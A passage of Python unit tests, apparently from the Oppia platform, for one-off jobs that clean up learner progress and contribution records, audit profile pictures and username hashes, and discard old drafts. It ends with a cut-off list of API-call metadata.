rights_manager.publish_collection(self.owner, 'col')
self.signup('user@email', 'user')
self.user_id = self.get_user_id_from_email('user@email')
learner_progress_services.mark_exploration_as_completed(
self.user_id, '0')
collection_services.record_played_exploration_in_collection_context(
self.user_id, 'col', '0')
learner_progress_services.mark_exploration_as_completed(
self.user_id, '1')
collection_services.record_played_exploration_in_collection_context(
self.user_id, 'col', '1')
self.model_instance = user_models.CollectionProgressModel.get_by_id(
'%s.col' % self.user_id)
self.process_and_flush_pending_mapreduce_tasks()
def test_standard_operation(self):
job_id = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.create_new())
user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue(
job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.get_output(job_id))
self.assertEqual(output, [])
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
def test_migration_job_skips_deleted_model(self):
self.model_instance.completed_explorations.append('3')
self.model_instance.deleted = True
self.model_instance.update_timestamps()
self.model_instance.put()
job_id = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.create_new())
user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue(
job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.get_output(job_id))
self.assertEqual(output, [])
def test_job_cleans_up_exploration_ids_not_present_in_collection(self):
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '1'])
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
self.model_instance.completed_explorations.append('3')
self.model_instance.update_timestamps()
self.model_instance.put()
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1', '3'])
job_id = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.create_new())
user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue(
job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.get_output(job_id))
expected_output = [(
'[u\'Added missing exp ids in CompletedActivitiesModel\', '
'[u\'%s.col\']]' % self.user_id
), (
'[u\'Invalid Exploration IDs cleaned from '
'CollectionProgressModel\', '
'[u"Model id: %s.col, Collection id: col, Removed exploration ids: '
'[u\'3\']"]]' % self.user_id)]
self.assertEqual(output, expected_output)
self.model_instance = user_models.CollectionProgressModel.get_by_id(
'%s.col' % self.user_id)
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '1', '3'])
def test_job_creates_completed_activities_model_if_it_is_missing(self):
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '1'])
completed_activities_model.delete()
self.assertIsNone(
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
job_id = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.create_new())
user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue(
job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.get_output(job_id))
self.assertEqual(
output, [
'[u\'Regenerated Missing CompletedActivitiesModel\', '
'[u\'%s.col\']]' % self.user_id])
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '1'])
def test_job_updates_completed_activities_model_if_exp_ids_do_not_match(
self):
learner_progress_services.mark_exploration_as_completed(
self.user_id, '2')
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '1', '2'])
completed_activities_model.exploration_ids = ['0', '2']
completed_activities_model.update_timestamps()
completed_activities_model.put()
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '2'])
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
job_id = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.create_new())
user_jobs_one_off.CleanUpCollectionProgressModelOneOffJob.enqueue(
job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off
.CleanUpCollectionProgressModelOneOffJob.get_output(job_id))
self.assertEqual(
output, [
'[u\'Added missing exp ids in CompletedActivitiesModel\', '
'[u\'%s.col\']]' % self.user_id])
self.assertEqual(
self.model_instance.completed_explorations, ['0', '1'])
completed_activities_model = (
user_models.CompletedActivitiesModel.get_by_id(self.user_id))
self.assertEqual(
completed_activities_model.exploration_ids, ['0', '2', '1'])
class CleanUpUserContributionsModelOneOffJobTests(test_utils.GenericTestBase):
def setUp(self):
super(CleanUpUserContributionsModelOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup('user@email', 'user')
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email('user@email')
self.owner = user_services.get_user_actions_info(self.owner_id)
self.user = user_services.get_user_actions_info(self.user_id)
self.save_new_valid_exploration(
'exp0', self.user_id, end_state_name='End')
self.save_new_valid_exploration(
'exp1', self.owner_id, end_state_name='End')
exp_services.update_exploration(
self.user_id, 'exp1', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
rights_manager.publish_exploration(self.user, 'exp0')
rights_manager.publish_exploration(self.owner, 'exp1')
self.process_and_flush_pending_mapreduce_tasks()
def test_standard_operation(self):
job_id = (
user_jobs_one_off
.CleanUpUserContributionsModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output(
job_id))
self.assertEqual(output, [])
model_instance_1 = user_models.UserContributionsModel.get_by_id(
self.user_id)
self.assertEqual(model_instance_1.created_exploration_ids, ['exp0'])
self.assertEqual(
model_instance_1.edited_exploration_ids, ['exp0', 'exp1'])
model_instance_2 = user_models.UserContributionsModel.get_by_id(
self.owner_id)
self.assertEqual(model_instance_2.created_exploration_ids, ['exp1'])
self.assertEqual(
model_instance_2.edited_exploration_ids, ['exp1'])
def test_migration_job_skips_deleted_model(self):
model_instance = user_models.UserContributionsModel.get_by_id(
self.user_id)
model_instance.deleted = True
model_instance.update_timestamps()
model_instance.put()
exp_services.delete_exploration(self.user_id, 'exp0')
job_id = (
user_jobs_one_off
.CleanUpUserContributionsModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output(
job_id))
self.assertEqual(output, [])
def test_job_removes_deleted_exp_from_created_explorations(self):
exp_services.delete_exploration(self.user_id, 'exp0')
model_instance_1 = user_models.UserContributionsModel.get_by_id(
self.user_id)
self.assertEqual(model_instance_1.created_exploration_ids, ['exp0'])
self.assertEqual(
model_instance_1.edited_exploration_ids, ['exp0', 'exp1'])
model_instance_2 = user_models.UserContributionsModel.get_by_id(
self.owner_id)
self.assertEqual(model_instance_2.created_exploration_ids, ['exp1'])
self.assertEqual(
model_instance_2.edited_exploration_ids, ['exp1'])
job_id = (
user_jobs_one_off
.CleanUpUserContributionsModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output(
job_id))
self.assertEqual(
output, [
'[u\'Removed deleted exp ids from UserContributionsModel\', '
'[u"Model id: %s, Removed exploration ids: [u\'exp0\', '
'u\'exp0\']"]]' % self.user_id])
model_instance_1 = user_models.UserContributionsModel.get_by_id(
self.user_id)
self.assertEqual(model_instance_1.created_exploration_ids, [])
self.assertEqual(model_instance_1.edited_exploration_ids, ['exp1'])
model_instance_2 = user_models.UserContributionsModel.get_by_id(
self.owner_id)
self.assertEqual(model_instance_2.created_exploration_ids, ['exp1'])
self.assertEqual(
model_instance_2.edited_exploration_ids, ['exp1'])
def test_job_removes_deleted_exp_from_edited_explorations(self):
exp_services.delete_exploration(self.owner_id, 'exp1')
model_instance_1 = user_models.UserContributionsModel.get_by_id(
self.user_id)
self.assertEqual(model_instance_1.created_exploration_ids, ['exp0'])
self.assertEqual(
model_instance_1.edited_exploration_ids, ['exp0', 'exp1'])
model_instance_2 = user_models.UserContributionsModel.get_by_id(
self.owner_id)
self.assertEqual(model_instance_2.created_exploration_ids, ['exp1'])
self.assertEqual(
model_instance_2.edited_exploration_ids, ['exp1'])
job_id = (
user_jobs_one_off
.CleanUpUserContributionsModelOneOffJob.create_new())
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
output = (
user_jobs_one_off.CleanUpUserContributionsModelOneOffJob.get_output(
job_id))
removed_exp_list = [
'Model id: %s, Removed exploration ids: '
'[u\'exp1\', u\'exp1\']' % self.owner_id,
'Model id: %s, Removed exploration ids: '
'[u\'exp1\']' % self.user_id]
removed_exp_list.sort()
self.assertEqual(
output, [
'[u\'Removed deleted exp ids from UserContributionsModel\', '
'[u"%s", u"%s"]]' % (removed_exp_list[0], removed_exp_list[1])])
model_instance_1 = user_models.UserContributionsModel.get_by_id(
self.user_id)
self.assertEqual(model_instance_1.created_exploration_ids, ['exp0'])
self.assertEqual(model_instance_1.edited_exploration_ids, ['exp0'])
model_instance_2 = user_models.UserContributionsModel.get_by_id(
self.owner_id)
self.assertEqual(model_instance_2.created_exploration_ids, [])
self.assertEqual(
model_instance_2.edited_exploration_ids, [])
class ProfilePictureAuditOneOffJobTests(test_utils.GenericTestBase):
AUTO_CREATE_DEFAULT_SUPERADMIN_USER = False
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = user_jobs_one_off.ProfilePictureAuditOneOffJob.create_new()
user_jobs_one_off.ProfilePictureAuditOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.ProfilePictureAuditOneOffJob.get_output(job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
return eval_output
def setUp(self):
super(ProfilePictureAuditOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
user_services.generate_initial_profile_picture(self.owner_id)
def test_correct_profile_picture_has_success_value(self):
user_services.generate_initial_profile_picture(self.owner_id)
output = self._run_one_off_job()
self.assertEqual(output, [['SUCCESS', 1]])
def test_resized_image_has_profile_picture_non_standard_dimensions_error(
self):
user_services.update_profile_picture_data_url(
self.owner_id, image_constants.PNG_IMAGE_WRONG_DIMENSIONS_BASE64)
output = self._run_one_off_job()
self.assertEqual(
output,
[[
'FAILURE - PROFILE PICTURE NON STANDARD DIMENSIONS - 150,160',
[self.OWNER_USERNAME]
]]
)
def test_invalid_image_has_cannot_load_picture_error(self):
user_services.update_profile_picture_data_url(
self.owner_id, image_constants.PNG_IMAGE_BROKEN_BASE64)
output = self._run_one_off_job()
self.assertEqual(
output,
[['FAILURE - CANNOT LOAD PROFILE PICTURE', [self.OWNER_USERNAME]]]
)
def test_non_png_image_has_profile_picture_not_png_error(self):
user_services.update_profile_picture_data_url(
self.owner_id, image_constants.JPG_IMAGE_BASE64)
output = self._run_one_off_job()
self.assertEqual(
output,
[['FAILURE - PROFILE PICTURE NOT PNG', [self.OWNER_USERNAME]]]
)
def test_broken_base64_data_url_has_invalid_profile_picture_data_url_error(
self):
user_services.update_profile_picture_data_url(
self.owner_id, image_constants.BROKEN_BASE64)
output = self._run_one_off_job()
self.assertEqual(
output,
[[
'FAILURE - INVALID PROFILE PICTURE DATA URL',
[self.OWNER_USERNAME]
]]
)
def test_user_without_profile_picture_has_missing_profile_picture_error(
self):
user_services.update_profile_picture_data_url(self.owner_id, None)
output = self._run_one_off_job()
self.assertEqual(
output,
[['FAILURE - MISSING PROFILE PICTURE', [self.OWNER_USERNAME]]]
)
def test_not_registered_user_has_not_registered_value(self):
user_settings_model = (
user_models.UserSettingsModel.get_by_id(self.owner_id))
user_settings_model.username = None
user_settings_model.update_timestamps()
user_settings_model.put()
output = self._run_one_off_job()
self.assertEqual(output, [['SUCCESS - NOT REGISTERED', 1]])
def test_deleted_user_has_deleted_value(self):
user_settings_model = (
user_models.UserSettingsModel.get_by_id(self.owner_id))
user_settings_model.deleted = True
user_settings_model.update_timestamps()
user_settings_model.put()
output = self._run_one_off_job()
self.assertEqual(output, [['SUCCESS - DELETED', 1]])
def test_zero_users_has_no_output(self):
user_models.UserSettingsModel.delete_by_id(self.owner_id)
output = self._run_one_off_job()
self.assertEqual(output, [])
def test_multiple_users_have_correct_values(self):
self.signup(self.NEW_USER_EMAIL, self.NEW_USER_USERNAME)
new_user_id = self.get_user_id_from_email(self.NEW_USER_EMAIL)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.signup(self.MODERATOR_EMAIL, self.MODERATOR_USERNAME)
moderator_id = self.get_user_id_from_email(self.MODERATOR_EMAIL)
user_services.update_profile_picture_data_url(
new_user_id, image_constants.JPG_IMAGE_BASE64)
user_services.update_profile_picture_data_url(editor_id, None)
user_settings_model = (
user_models.UserSettingsModel.get_by_id(moderator_id))
user_settings_model.deleted = True
user_settings_model.update_timestamps()
user_settings_model.put()
output = self._run_one_off_job()
self.assertItemsEqual(
output,
[
['SUCCESS', 1],
['FAILURE - MISSING PROFILE PICTURE', [self.EDITOR_USERNAME]],
['SUCCESS - DELETED', 1],
['FAILURE - PROFILE PICTURE NOT PNG', [self.NEW_USER_USERNAME]]
]
)
class UniqueHashedNormalizedUsernameAuditJobTests(test_utils.GenericTestBase):
AUTO_CREATE_DEFAULT_SUPERADMIN_USER = False
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob
.create_new())
user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.UniqueHashedNormalizedUsernameAuditJob.get_output(
job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
for item in eval_output:
if item[0] == 'FAILURE':
item[1] = sorted(item[1])
return eval_output
def test_audit_user_with_username_is_successful(self):
model = user_models.UserSettingsModel(id='id', email='<EMAIL>')
model.update_timestamps()
model.put()
output = self._run_one_off_job()
self.assertEqual(output, [['SUCCESS USERNAME NONE', 1]])
def test_audit_users_with_different_usernames_is_successful(self):
# Generate 4 different users.
for i in python_utils.RANGE(4):
model = user_models.UserSettingsModel(
id='id%s' % i,
email='<EMAIL>' % i,
normalized_username='username%s' % i
)
model.update_timestamps()
model.put()
output = self._run_one_off_job()
self.assertEqual(output, [])
def test_audit_users_with_different_usernames_all_hashes_same_fails(self):
# Generate 4 different users.
for i in python_utils.RANGE(4):
model = user_models.UserSettingsModel(
id='id%s' % i,
email='<EMAIL>' % i,
normalized_username='username%s' % i
)
model.update_timestamps()
model.put()
def mock_convert_to_hash(*_):
"""Function that takes any number of arguments and returns the
same hash for all inputs.
"""
return 'hashhash'
with self.swap(utils, 'convert_to_hash', mock_convert_to_hash):
output = self._run_one_off_job()
self.assertEqual(
output,
[['FAILURE', ['username%s' % i for i in python_utils.RANGE(4)]]])
def test_audit_users_with_different_usernames_some_hashes_same_fails(self):
# Generate 5 different users.
for i in python_utils.RANGE(5):
model = user_models.UserSettingsModel(
id='id%s' % i,
email='<EMAIL>' % i,
normalized_username='username%s' % i
)
model.update_timestamps()
model.put()
def mock_convert_to_hash(username, _):
"""Function that takes username and returns the same hash for some
usernames and unique hash for others.
"""
if username in ('username1', 'username2'):
return 'hashhash'
return hash(username)
with self.swap(utils, 'convert_to_hash', mock_convert_to_hash):
output = self._run_one_off_job()
self.assertEqual(output, [['FAILURE', ['username1', 'username2']]])
class DiscardOldDraftsOneOffJobTests(test_utils.GenericTestBase):
EXP_USER_DATA_MODEL_ID = 'user_id.exp_id'
USER_ID = 'user_id'
EXP_ID = 'exp_id'
def setUp(self):
super(DiscardOldDraftsOneOffJobTests, self).setUp()
self.save_new_valid_exploration(self.EXP_ID, self.USER_ID)
def _run_job_and_verify_output(self, expected_output):
"""Runs the DiscardOldDraftsOneOffJob and verifies that the output
matches the expected output.
Args:
expected_output: list(str). The expected output from the one-off
job.
"""
job_id = user_jobs_one_off.DiscardOldDraftsOneOffJob.create_new()
user_jobs_one_off.DiscardOldDraftsOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
actual_output = user_jobs_one_off.DiscardOldDraftsOneOffJob.get_output(
job_id)
self.assertEqual(sorted(actual_output), sorted(expected_output))
def _create_exp_user_data_model(self, draft_change_list, last_updated):
"""Creates a new ExplorationUserDataModel with the given parameters.
Args:
draft_change_list: list(dict)|None. The change list corresponding
to the user's draft for this exploration, or None if there is
no such draft.
last_updated: datetime.datetime. When the draft was last updated.
"""
user_models.ExplorationUserDataModel(
id=self.EXP_USER_DATA_MODEL_ID,
user_id=self.USER_ID,
exploration_id=self.EXP_ID,
rating=2,
rated_on=datetime.datetime(2018, 1, 1),
draft_change_list=draft_change_list,
draft_change_list_last_updated=last_updated,
draft_change_list_exp_version=3,
draft_change_list_id=1
).put()
def test_models_without_drafts_are_ignored(self):
self._create_exp_user_data_model(None, None)
self._run_job_and_verify_output([])
def test_draft_left_alone_if_it_is_current(self):
self._create_exp_user_data_model(
{'new_content': {}}, datetime.datetime(2021, 1, 1))
self._run_job_and_verify_output([])
def test_draft_discarded_if_exploration_is_missing(self):
exp_services.delete_exploration(self.USER_ID, self.EXP_ID)
self._create_exp_user_data_model(
{'new_content': {}}, datetime.datetime(2021, 1, 1))
old_model = user_models.ExplorationUserDataModel.get_by_id(
self.EXP_USER_DATA_MODEL_ID)
self.assertIsNotNone(old_model.draft_change_list)
self.assertIsNotNone(old_model.draft_change_list_last_updated)
self.assertIsNotNone(old_model.draft_change_list_exp_version)
self._run_job_and_verify_output([
'[u\'DISCARDED - Exploration is missing\', [u\'%s\']]' %
self.EXP_USER_DATA_MODEL_ID,
'[u\'SUCCESS - Discarded draft\', 1]'
])
new_model = user_models.ExplorationUserDataModel.get_by_id(
self.EXP_USER_DATA_MODEL_ID)
self.assertLess(old_model.last_updated, new_model.last_updated)
self.assertIsNone(new_model.draft_change_list)
self.assertIsNone(new_model.draft_change_list_last_updated)
self.assertIsNone(new_model.draft_change_list_exp_version)
def test_draft_discarded_if_it_is_too_old(self):
self._create_exp_user_data_model(
{'new_content': {}}, datetime.datetime(2017, 1, 1))
old_model = user_models.ExplorationUserDataModel.get_by_id(
self.EXP_USER_DATA_MODEL_ID)
self.assertIsNotNone(old_model.draft_change_list)
self.assertIsNotNone(old_model.draft_change_list_last_updated)
self.assertIsNotNone(old_model.draft_change_list_exp_version)
self._run_job_and_verify_output([
'[u\'DISCARDED - Draft is old\', [u\'%s\']]' %
self.EXP_USER_DATA_MODEL_ID,
'[u\'SUCCESS - Discarded draft\', 1]'
])
new_model = user_models.ExplorationUserDataModel.get_by_id(
self.EXP_USER_DATA_MODEL_ID)
self.assertLess(old_model.last_updated, new_model.last_updated)
self.assertIsNone(new_model.draft_change_list)
self.assertIsNone(new_model.draft_change_list_last_updated)
self.assertIsNone(new_model.draft_change_list_exp_version)
| [
"core.domain.user_jobs_one_off.UserContributionsOneOffJob.enqueue",
"core.domain.collection_services.delete_collection",
"core.domain.event_services.StartExplorationEventHandler.record",
"core.domain.user_jobs_one_off.CleanUpUserSubscribersModelOneOffJob.create_new",
"core.domain.user_jobs_one_off.UsernameL... | [((1712, 1835), 'core.platform.models.Registry.import_models', 'models.Registry.import_models', (['[models.NAMES.auth, models.NAMES.user, models.NAMES.feedback, models.NAMES.\n exploration]'], {}), '([models.NAMES.auth, models.NAMES.user, models\n .NAMES.feedback, models.NAMES.exploration])\n', (1741, 1835), False, 'from core.platform import models\n'), ((1872, 1915), 'core.platform.models.Registry.import_datastore_services', 'models.Registry.import_datastore_services', ([], {}), '()\n', (1913, 1915), False, 'from core.platform import models\n'), ((1934, 1974), 'core.platform.models.Registry.import_search_services', 'models.Registry.import_search_services', ([], {}), '()\n', (1972, 1974), False, 'from core.platform import models\n'), ((34625, 34667), 'core.domain.user_services.get_current_date_as_string', 'user_services.get_current_date_as_string', ([], {}), '()\n', (34665, 34667), False, 'from core.domain import user_services\n'), ((2474, 2531), 'core.domain.user_jobs_one_off.UserContributionsOneOffJob.create_new', 'user_jobs_one_off.UserContributionsOneOffJob.create_new', ([], {}), '()\n', (2529, 2531), False, 'from core.domain import user_jobs_one_off\n'), ((2540, 2600), 'core.domain.user_jobs_one_off.UserContributionsOneOffJob.enqueue', 'user_jobs_one_off.UserContributionsOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (2592, 2600), False, 'from core.domain import user_jobs_one_off\n'), ((8494, 8560), 'core.domain.user_jobs_one_off.UsernameLengthDistributionOneOffJob.create_new', 'user_jobs_one_off.UsernameLengthDistributionOneOffJob.create_new', ([], {}), '()\n', (8558, 8560), False, 'from core.domain import user_jobs_one_off\n'), ((8570, 8639), 'core.domain.user_jobs_one_off.UsernameLengthDistributionOneOffJob.enqueue', 'user_jobs_one_off.UsernameLengthDistributionOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (8631, 8639), False, 'from core.domain import user_jobs_one_off\n'), ((8882, 8954), 'core.domain.user_jobs_one_off.UsernameLengthDistributionOneOffJob.get_output', 'user_jobs_one_off.UsernameLengthDistributionOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (8946, 8954), False, 'from core.domain import user_jobs_one_off\n'), ((11621, 11680), 'core.domain.user_jobs_one_off.UsernameLengthAuditOneOffJob.create_new', 'user_jobs_one_off.UsernameLengthAuditOneOffJob.create_new', ([], {}), '()\n', (11678, 11680), False, 'from core.domain import user_jobs_one_off\n'), ((11690, 11752), 'core.domain.user_jobs_one_off.UsernameLengthAuditOneOffJob.enqueue', 'user_jobs_one_off.UsernameLengthAuditOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (11744, 11752), False, 'from core.domain import user_jobs_one_off\n'), ((11967, 12032), 'core.domain.user_jobs_one_off.UsernameLengthAuditOneOffJob.get_output', 'user_jobs_one_off.UsernameLengthAuditOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (12024, 12032), False, 'from core.domain import user_jobs_one_off\n'), ((13237, 13289), 'core.domain.user_jobs_one_off.LongUserBiosOneOffJob.create_new', 'user_jobs_one_off.LongUserBiosOneOffJob.create_new', ([], {}), '()\n', (13287, 13289), False, 'from core.domain import user_jobs_one_off\n'), ((13299, 13354), 'core.domain.user_jobs_one_off.LongUserBiosOneOffJob.enqueue', 'user_jobs_one_off.LongUserBiosOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (13346, 13354), False, 'from core.domain import user_jobs_one_off\n'), ((13598, 13656), 'core.domain.user_jobs_one_off.LongUserBiosOneOffJob.get_output', 'user_jobs_one_off.LongUserBiosOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (13648, 13656), False, 'from core.domain import user_jobs_one_off\n'), ((14429, 14486), 'core.domain.user_services.update_user_bio', 'user_services.update_user_bio', (['user_id_a', 'self.USER_A_BIO'], {}), '(user_id_a, self.USER_A_BIO)\n', (14458, 14486), False, 'from core.domain import user_services\n'), ((14818, 14875), 'core.domain.user_services.update_user_bio', 'user_services.update_user_bio', (['user_id_b', 'self.USER_B_BIO'], {}), '(user_id_b, self.USER_B_BIO)\n', (14847, 14875), False, 'from core.domain import user_services\n'), ((15256, 15313), 'core.domain.user_services.update_user_bio', 'user_services.update_user_bio', (['user_id_b', 'self.USER_B_BIO'], {}), '(user_id_b, self.USER_B_BIO)\n', (15285, 15313), False, 'from core.domain import user_services\n'), ((15450, 15507), 'core.domain.user_services.update_user_bio', 'user_services.update_user_bio', (['user_id_c', 'self.USER_C_BIO'], {}), '(user_id_c, self.USER_C_BIO)\n', (15479, 15507), False, 'from core.domain import user_services\n'), ((15927, 15984), 'core.domain.user_services.update_user_bio', 'user_services.update_user_bio', (['user_id_c', 'self.USER_C_BIO'], {}), '(user_id_c, self.USER_C_BIO)\n', (15956, 15984), False, 'from core.domain import user_services\n'), ((16121, 16178), 'core.domain.user_services.update_user_bio', 'user_services.update_user_bio', (['user_id_d', 'self.USER_D_BIO'], {}), '(user_id_d, self.USER_D_BIO)\n', (16150, 16178), False, 'from core.domain import user_services\n'), ((17356, 17418), 'core.domain.user_jobs_one_off.DashboardSubscriptionsOneOffJob.create_new', 'user_jobs_one_off.DashboardSubscriptionsOneOffJob.create_new', ([], {}), '()\n', (17416, 17418), False, 'from core.domain import user_jobs_one_off\n'), ((17427, 17492), 'core.domain.user_jobs_one_off.DashboardSubscriptionsOneOffJob.enqueue', 'user_jobs_one_off.DashboardSubscriptionsOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (17484, 17492), False, 'from core.domain import user_jobs_one_off\n'), ((18407, 18458), 'core.domain.user_services.get_user_actions_info', 'user_services.get_user_actions_info', (['self.user_a_id'], {}), '(self.user_a_id)\n', (18442, 18458), False, 'from core.domain import user_services\n'), ((35030, 35084), 'core.domain.user_jobs_one_off.DashboardStatsOneOffJob.create_new', 'user_jobs_one_off.DashboardStatsOneOffJob.create_new', ([], {}), '()\n', (35082, 35084), False, 'from core.domain import user_jobs_one_off\n'), ((35093, 35150), 'core.domain.user_jobs_one_off.DashboardStatsOneOffJob.enqueue', 'user_jobs_one_off.DashboardStatsOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (35142, 35150), False, 'from core.domain import user_jobs_one_off\n'), ((36002, 36071), 'core.domain.rating_services.assign_rating_to_exploration', 'rating_services.assign_rating_to_exploration', (['user_id', 'exp_id', 'rating'], {}), '(user_id, exp_id, rating)\n', (36046, 36071), False, 'from core.domain import rating_services\n'), ((36431, 36569), 'core.domain.event_services.StartExplorationEventHandler.record', 'event_services.StartExplorationEventHandler.record', (['exp_id', 'self.EXP_VERSION', 'state', 'self.USER_SESSION_ID', '{}', 'feconf.PLAY_TYPE_NORMAL'], {}), '(exp_id, self.EXP_VERSION,\n state, self.USER_SESSION_ID, {}, feconf.PLAY_TYPE_NORMAL)\n', (36481, 36569), False, 'from core.domain import event_services\n'), ((36975, 37030), 'core.domain.user_services.get_weekly_dashboard_stats', 'user_services.get_weekly_dashboard_stats', (['self.owner_id'], {}), '(self.owner_id)\n', (37015, 37030), False, 'from core.domain import user_services\n'), ((37385, 37440), 'core.domain.user_services.get_weekly_dashboard_stats', 'user_services.get_weekly_dashboard_stats', (['self.owner_id'], {}), '(self.owner_id)\n', (37425, 37440), False, 'from core.domain import user_services\n'), ((38228, 38283), 'core.domain.user_services.get_weekly_dashboard_stats', 'user_services.get_weekly_dashboard_stats', (['self.owner_id'], {}), '(self.owner_id)\n', (38268, 38283), False, 'from core.domain import user_services\n'), ((38901, 39055), 'core.domain.event_services.StatsEventsHandler.record', 'event_services.StatsEventsHandler.record', (['self.EXP_ID_1', '(1)', "{'num_starts': 1, 'num_actual_starts': 0, 'num_completions': 0,\n 'state_stats_mapping': {}}"], {}), "(self.EXP_ID_1, 1, {'num_starts': 1,\n 'num_actual_starts': 0, 'num_completions': 0, 'state_stats_mapping': {}})\n", (38941, 39055), False, 'from core.domain import event_services\n'), ((39506, 39561), 'core.domain.user_services.get_weekly_dashboard_stats', 'user_services.get_weekly_dashboard_stats', (['self.owner_id'], {}), '(self.owner_id)\n', (39546, 39561), False, 'from core.domain import user_services\n'), ((40385, 40539), 'core.domain.event_services.StatsEventsHandler.record', 'event_services.StatsEventsHandler.record', (['self.EXP_ID_1', '(1)', "{'num_starts': 1, 'num_actual_starts': 0, 'num_completions': 0,\n 'state_stats_mapping': {}}"], {}), "(self.EXP_ID_1, 1, {'num_starts': 1,\n 'num_actual_starts': 0, 'num_completions': 0, 'state_stats_mapping': {}})\n", (40425, 40539), False, 'from core.domain import event_services\n'), ((40989, 41044), 'core.domain.user_services.get_weekly_dashboard_stats', 'user_services.get_weekly_dashboard_stats', (['self.owner_id'], {}), '(self.owner_id)\n', (41029, 41044), False, 'from core.domain import user_services\n'), ((41701, 41855), 'core.domain.event_services.StatsEventsHandler.record', 'event_services.StatsEventsHandler.record', (['self.EXP_ID_1', '(1)', "{'num_starts': 2, 'num_actual_starts': 0, 'num_completions': 0,\n 'state_stats_mapping': {}}"], {}), "(self.EXP_ID_1, 1, {'num_starts': 2,\n 'num_actual_starts': 0, 'num_completions': 0, 'state_stats_mapping': {}})\n", (41741, 41855), False, 'from core.domain import event_services\n'), ((42305, 42360), 'core.domain.user_services.get_weekly_dashboard_stats', 'user_services.get_weekly_dashboard_stats', (['self.owner_id'], {}), '(self.owner_id)\n', (42345, 42360), False, 'from 